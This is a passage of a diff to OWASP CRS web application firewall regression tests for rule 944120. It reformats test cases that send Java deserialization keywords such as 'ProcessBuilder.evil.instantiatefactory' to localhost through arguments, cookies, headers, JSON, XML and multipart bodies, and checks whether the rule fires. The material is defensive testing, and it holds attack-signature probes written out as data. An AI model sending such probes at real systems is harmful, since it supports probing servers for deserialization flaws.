-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log_contains: "id \"944120\"" + - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 